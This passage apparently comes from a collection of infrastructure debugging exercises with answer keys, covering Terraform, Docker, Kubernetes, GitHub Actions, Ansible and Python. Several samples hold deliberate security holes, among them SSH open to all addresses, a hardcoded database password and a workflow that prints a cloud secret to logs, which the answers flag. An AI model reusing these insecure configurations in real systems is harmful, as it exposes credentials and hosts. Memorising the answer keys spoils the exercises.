      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>resource "google_compute_firewall" "allow_ssh" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  name    = "allow-ssh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  network = google_compute_network.vpc.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  allow {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    protocol = "tcp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports    = 22</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source_ranges = "0.0.0.0/0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) machine_type = e2-medium is missing quotes - it must be a string: "e2-medium". (2) tags should be a list, not a string: tags = ["web-server"]. (3) ports in the firewall rule should be a list of strings: ports = ["22"]. (4) source_ranges should be a list, not a bare string: source_ranges = ["0.0.0.0/0"] (and 0.0.0.0/0 on SSH is itself a security risk worth flagging separately - it should be scoped to a specific IP range or bastion). (5) google_compute_network.vpc is referenced but never defined as a resource in this snippet, which will fail plan with an undefined reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1461. Debug this Dockerfile: This image builds but fails security review and best-practice checks. Find every issue.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FROM ubuntu:latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ADD . /app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WORKDIR /app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RUN apt-get update &amp;&amp; apt-get install -y python3 python3-pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RUN pip3 install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ENV DB_PASSWORD=supersecret123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EXPOSE 8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CMD python3 app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Issues: (1) "FROM ubuntu:latest" uses a floating tag instead of a pinned version/digest, breaking reproducibility. (2) "ADD . /app" copies the entire build context including potentially unnecessary or sensitive files - should use COPY with a .dockerignore, since ADD's extra behaviors (auto-extracting archives, remote URLs) aren't needed here. (3) "ENV DB_PASSWORD=supersecret123" bakes a secret directly into the image layer history, visible to anyone with image access - secrets must be injected at runtime, never baked in. (4) The container runs as root by default (no USER instruction), which is a security risk. (5) No multi-stage build, so pip and build tooling stay in the final image, increasing size and attack surface. (6) CMD uses the shell form ("CMD python3 app.py") instead of exec form (["python3", "app.py"]), so the process doesn't receive signals directly, complicating graceful shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1462. Debug this Kubernetes manifest: This Deployment and Service are supposed to work together but traffic never reaches the pods. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apiVersion: apps/v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kind: Deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>metadata:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  name: payments-api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>spec:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  replicas: 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  selector:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    matchLabels:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      app: payments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  template:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    metadata:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      labels:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        app: payments-api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    spec:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      containers:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        - name: payments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          image: gcr.io/my-project/payments:v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          ports:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            - containerPort: 8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apiVersion: v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kind: Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>metadata:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  name: payments-svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>spec:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  selector:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    app: payments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  ports:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    - port: 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      targetPort: 9090</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) The Deployment's pod template label is "app: payments-api" but the Deployment's own selector.matchLabels is "app: payments" - these must match exactly, or the Deployment will fail to manage its pods (in fact this mismatch would be rejected/fail immediately since selector must match template labels). (2) The Service's selector is "app: payments" but the actual pod label is "app: payments-api", so even if the Deployment were fixed, the Service would still select zero pods. (3) The Service's targetPort is 9090 but the container actually listens on containerPort 8080 - traffic would be routed to the wrong port and fail. All three labels/ports need to be made consistent for traffic to reach the pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1463. Debug this GitHub Actions workflow: This deploy workflow has multiple security and correctness problems. Find every issue.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>name: deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>on: pull_request_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>jobs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  deploy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    steps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - uses: actions/checkout@main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Configure GCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: echo "GOOGLE_CREDENTIALS=${{ secrets.GCP_KEY }}" &gt;&gt; $GITHUB_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          echo $GOOGLE_CREDENTIALS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">          gcloud deploy releases create --region=us-central1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Issues: (1) "on: pull_request_target" runs with access to secrets even for PRs from forks, and combined with checking out untrusted fork code, this is a well-known supply-chain attack vector - untrusted code could exfiltrate secrets. (2) "uses: actions/checkout@main" pins to a mutable branch instead of a fixed commit SHA, so the action's behavior could change or be compromised without notice - should pin to a specific commit SHA. (3) The credential is echoed into GITHUB_ENV and then explicitly printed with "echo $GOOGLE_CREDENTIALS", which writes the secret directly into the build log in plaintext - GitHub normally masks known secrets but explicit echo like this can defeat masking and is a bad practice regardless. (4) Should use Workload Identity Federation (OIDC) instead of a static GCP_KEY secret to avoid a long-lived credential entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1464. Debug this Ansible playbook: This playbook is meant to be safely re-run on every host but breaks idempotency and has a risky default. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>- hosts: all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  become: yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  tasks:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Install nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      command: apt-get install -y nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Copy config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      copy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        src: nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        dest: /etc/nginx/nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Restart nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      service:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        name: nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        state: restarted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Open firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      command: ufw allow 0.0.0.0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) "command: apt-get install -y nginx" uses the raw command module instead of the apt module - this is not idempotent (it will attempt to reinstall/run apt-get every single run) and doesn't check current package state; should be "ansible.builtin.apt: name=nginx state=present". (2) The "Restart nginx" task uses state: restarted unconditionally on every run, which restarts nginx even when nothing changed - it should use a handler triggered only when the config file actually changes (notify/handlers pattern), or use state: started with a separate notify-triggered restart. (3) "ufw allow 0.0.0.0/0" opens the firewall to all sources on an unspecified port - this is a dangerous default; the rule should specify the exact port and, if possible, a scoped source range. (4) Using command for ufw also isn't idempotent - the ufw module should be used instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1465. Debug this Python retry helper: This is supposed to retry a flaky API call with backoff, but it can loop forever or swallow real errors. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>def call_api(url, max_retries=3):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    attempt = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            response = requests.get(url)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            return response.json()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        except:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            attempt += 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("retrying")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) "while True" with no maximum retry check means if the API call keeps failing, this loops forever - the max_retries parameter is accepted but never actually used to bound the loop. (2) A bare "except:" catches every exception including KeyboardInterrupt and SystemExit, and swallows the real error without logging it or re-raising after retries are exhausted - the caller has no way to know what actually went wrong. (3) There's no delay/backoff between retries (no time.sleep), so a failing request retries instantly in a tight loop, hammering the failing service. (4) response.raise_for_status() is never called, so an HTTP error status (like a 500) wouldn't even trigger the except block - .json() would just parse whatever error body was returned as if it were valid data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
